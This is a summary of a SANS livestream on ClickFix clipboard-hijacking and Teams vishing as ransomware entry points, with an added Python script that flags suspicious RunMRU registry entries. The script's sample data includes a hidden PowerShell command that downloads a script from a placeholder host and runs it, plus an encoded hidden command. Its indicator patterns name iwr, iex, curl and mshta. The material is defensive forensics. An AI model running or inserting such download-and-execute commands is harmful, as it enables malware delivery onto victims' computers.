Stay Ahead of Ransomware - Initial Access via Evolving Social Engineering
Why It Matters
ClickFix and Teams vishing are rapidly becoming top ransomware entry points, and detecting their forensic artifacts early can prevent costly breaches.
Key Takeaways
- ClickFix attacks surged 517% in 2025, targeting all sectors
- Microsoft Teams vishing is now a common ransomware entry vector
- The Run-MRU registry key logs malicious Windows+R (Run dialog) commands
- PowerShell logging is crucial for detecting post-execution payloads
- User education on clipboard hijacking reduces initial-access risk
Summary
The April 2026 SANS "Stay Ahead of Ransomware" livestream focused on evolving social-engineering techniques that grant attackers initial access. Hosts Ryan Chapman and Mary DeGrazia examined two prominent vectors: the ClickFix scheme, which lures users to a fake CAPTCHA page that hijacks the clipboard and gets the victim to execute PowerShell through the Windows+R (Run) dialog, and Microsoft Teams-based vishing, where threat actors impersonate trusted contacts to deliver malicious links that trigger remote-access tools.
Data presented highlighted a dramatic 517% rise in ClickFix incidents during 2025, now rivaling traditional RDP and VPN exploitation as an entry point. The presenters referenced Coveware and Unit 42 reports showing the technique's spread across high-tech, manufacturing, real-estate, and other industries. They demonstrated how the Run-MRU registry key preserves the history of commands typed into the Run dialog, including the malicious one, and emphasized that PowerShell logging, when enabled, captures the subsequent payload execution, providing forensic breadcrumbs.
Mary illustrated a live-recorded scenario: a user receives an email that appears to come from a trusted friend, follows a verification link, and is prompted to press Windows+R and paste a PowerShell command that the page has copied to the clipboard. The victim's repeated attempts generate multiple Run-MRU entries and email threads, which investigators can trace. Ryan complemented this with a walkthrough of Teams-based phishing, showing how Quick Assist and remote-monitoring tools are abused after a successful vishing call.
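To make the Run-MRU point concrete, here is an added Python example (not code from the livestream or its presenters) that parses a RunMRU value set in MRUList order and flags entries carrying ClickFix-style indicators. The registry values are constructed samples; the value layout (slots a, b, c with a trailing "\1", ordered by MRUList) is the real key's format.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU,
# shaped like what a registry export or hive parser yields. Real RunMRU values are
# named a, b, c ... with data ending in "\1"; MRUList lists them most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iwr http://example.invalid/x.ps1 | iex"\\1',
    "c": "mstsc\\1",
    "d": "powershell -nop -w hidden -ep bypass -enc QUJDREVGR0hJSktMTU5PUA==\\1",
}

# Indicators commonly seen in ClickFix-style Run dialog commands (matched case-insensitively).
INDICATORS = [
    (r"\b(powershell|pwsh)\b", "PowerShell launched from the Run dialog"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{8,}", "encoded command"),
    (r"\biex\b|invoke-expression", "Invoke-Expression"),
    (r"\biwr\b|invoke-webrequest|downloadstring|\bcurl\b", "fetches remote content"),
    (r"\bmshta\b", "mshta"),
]

@dataclass
class RunMruEntry:
    slot: str          # value name (a, b, c ...)
    position: int      # 0 = most recent according to MRUList
    command: str       # command text with the trailing "\1" removed
    indicators: list = field(default_factory=list)

def parse_runmru(values):
    """Return RunMRU entries in MRUList order, each tagged with the indicators it matched."""
    entries = []
    for pos, slot in enumerate(values.get("MRUList", "")):
        raw = values.get(slot)
        if raw is None:          # MRUList can reference a slot that was cleared
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        hits = [label for pat, label in INDICATORS if re.search(pat, cmd, re.IGNORECASE)]
        entries.append(RunMruEntry(slot, pos, cmd, hits))
    return entries

def flag_clickfix(values, min_hits=2):
    """Entries with at least min_hits indicators; repeated victim attempts show up as several."""
    return [e for e in parse_runmru(values) if len(e.indicators) >= min_hits]

if __name__ == "__main__":
    for e in flag_clickfix(SAMPLE_RUNMRU):
        print(f"[{e.position}] {e.slot}: {e.command}  <- {', '.join(e.indicators)}")
```

On a live Windows host the same dict can be built from `winreg` or from a RunMRU key exported with `reg export`, so the function runs unchanged over real triage data.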
The discussion underscored the need for proactive defenses: enforce strict PowerShell logging, monitor Run‑MRU registry activity, and conduct regular user awareness training on clipboard hijacking and Teams vishing. Organizations that harden remote‑access services and educate staff can significantly lower the probability of ransomware deployment originating from these social‑engineering tactics.